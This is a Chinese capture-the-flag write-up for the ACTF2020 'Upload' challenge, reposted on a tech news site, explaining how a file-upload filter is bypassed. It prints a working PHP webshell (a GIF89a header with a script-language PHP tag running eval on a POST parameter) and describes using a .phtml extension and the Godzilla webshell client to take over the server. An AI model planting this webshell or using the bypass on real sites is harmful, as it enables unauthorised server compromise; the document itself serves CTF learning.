当前位置: 首页 > ai >正文

[ACTF2020 新生赛]Upload

ai 2025/7/5 0:43:40

     先写一个万能的一句话木马

  • 使用一句话木马

  • 发现这个是有内容过滤的 过滤了 <?

  • 发现这个过滤的很死
  • 那就只能使用 不带 ? 的短标签了 使用script 标签 这个的使用只限于对方的php是5版本的

  • 正好是低版本的

  • 所以直接上传 改一下后缀为 phtml

  • 成功上传 但是我们没有找到具体的上传地址 :1、目录扫描 2、猜一下是不是 upload 目录
  • 发现猜对了

  • 哥斯拉链接

  • 找一下flag

  • flag{537f95ae-87a4-43f4-973a-1492ae8a92af}
  • 知识点 : 1、php 后缀的绕过 : phtml
  • 2、 php短标签的绕过(只有php版本为5开头的才行) :
  • GIF89a // 这个是万能标签 防止 MIME 检查文件头
  • <script language="php">
  • eval($_POST['pass']);
  • </script>
http://www.xdnf.cn/news/2302.html

相关文章:

  • DeepSeek智能时空数据分析(五):基于区域人口数量绘制地图散点-大模型搜集数据NL2SQL加工数据
  • Python对比两张CAD图并标记差异的解决方案
  • 第5章 数据库系统(选择|案例|论文)(重点★★★★★)
  • 【ROS2】ROS开发环境配置——vscode和git
  • 【极致版】华为云Astro轻应用抽取IoTDA影子设备参数生成表格页面全流程
  • OceanBase数据库磁盘空间管理
  • AI声像融合守护幼儿安全——打骂/异常声音报警系统的智慧防护
  • 在Linux中使用ferror()函数和feof()函数判断文件是否读取成功,或者读取指针是否到达了文件末尾?
  • python实战项目66:抓取考研招生专业信息
  • 2025上海车展 | 移远通信重磅发布AR脚踢毫米波雷达,重新定义“无接触交互”尾门
  • IO与文件·I(linux+C)
  • 洛谷题目:P8856 [POI 2002] 火车线路 题解(有一点难)
  • Docker(二):docker常用命令
  • 概率论与统计(不确定性分析)主要应用在什么方面?涉及到具体知识是什么?
  • 如何识别DDoS攻击类型及有效防护?一篇简明指南
  • Git Bash 下使用 SSH 连接出现 “Software caused connection abort” 问题
  • Macos m系列芯片环境下python3安装mysqlclient系列问题
  • 数据需求管理办法有哪些?具体应如何应用?
  • 图神经网络(GNN)基本概念与核心原理
  • 某化工厂运维升级:智和信通运维平台实现工业交换机智能管理
  • Maven 4.0.0 模式-pom.xml配置详解
  • 《AI大模型应知应会100篇》第37篇:Agent框架入门:让AI具备自主行动能力
  • 数字巴别塔:全栈多模态开发框架如何用自然语言重构软件生产关系?
  • Unity 和 Unreal Engine(UE) 两大主流游戏引擎的核心使用方法
  • 回顾|Apache Cloudberry™ (Incubating) Meetup·2025 杭州站
  • MyBatis 类型处理器(TypeHandler)注册与映射机制:JsonListTypeHandler和JsonListTypeHandler注册时机
  • 174页Deepseek大模型在银行系统的部署方案
  • 一、I/O的相关概念
  • Spark RDD行动算子与共享变量实战:从数据聚合到分布式通信
  • 基于SpringBoot+PostgreSQL+ROS Java库机器人数据可视化管理系统